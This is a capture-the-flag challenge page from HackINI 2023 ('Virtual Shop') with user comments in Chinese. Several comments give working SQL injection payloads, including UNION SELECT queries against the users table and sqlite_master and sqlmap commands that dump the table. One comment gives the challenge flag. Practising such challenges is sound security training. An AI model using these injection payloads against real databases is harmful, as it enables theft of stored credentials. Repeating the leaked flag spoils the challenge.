Virtual ShopWEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: heyile
一血奖励: 0金币
解  决: 381
提  示:
描  述:
So, let's see if you can retrieve the `password` of the admin which\ \ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\ \ F100w"
...
登录回复
评论
tdwj 3月前
举报

一开始' union select 1,2,database(),4--+报错,看提示' union select 1,2,username,password from users--+倒是可出flag

回复 0
欧尼酱001 1年前
举报

1、将请求包保存为1.txt 2、python3 sqlmap.py -r 1.txt --batch --tables 3、python3 sqlmap.py -r 1.txt --batch -T users --dump 即可跑出表字段:shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}

回复 0
WCRH 1年前
举报

这又不是post请求,你还保存上txt了

回复 0
.⎛⎝•̀ω•́⎠⎞. 1年前
举报

只用sqlmap就可以做出来,很简单的一个注入

回复 0
FADogeCTF 1年前
举报

union查询

回复 0
xiaobai568 1年前
举报

前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了

回复 2
JJhello 2年前
举报

sqlmap即可

回复 0
chaoge 2年前
举报

sqlite,弄了半天认为是MySQL呢。

回复 0
justsosoloveyou 2年前
举报

' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+

回复 1
SS3B 2年前
举报

sqlmap一下子就出来了

回复 0
hopeinhand 2年前
举报

联合查询注入,表名、列名、用户名全给了,都没啥好说的了

回复 0

WriteUp

image
heyile

1 金币

立即查看

评分(0)

暂无评分

解题动态

glkdfjgkl 攻破了该题 2天前
eason2023 攻破了该题 2天前
zrc2682 攻破了该题 3天前
Ethan552525 攻破了该题 3天前
out不慢 攻破了该题 5天前
liang123456 攻破了该题 9天前
solomom 攻破了该题 9天前
鸡小哲 攻破了该题 11天前
caocao 攻破了该题 15天前
suona 攻破了该题 17天前
ndaygril 攻破了该题 17天前
wyyyy 攻破了该题 18天前
minz 攻破了该题 19天前
soha 攻破了该题 1月前
jc11459487 攻破了该题 1月前
chan52001 攻破了该题 1月前
xjuqwd 攻破了该题 1月前
ucole 攻破了该题 1月前
RobinHar 攻破了该题 1月前
13612180109 攻破了该题 1月前
问题反馈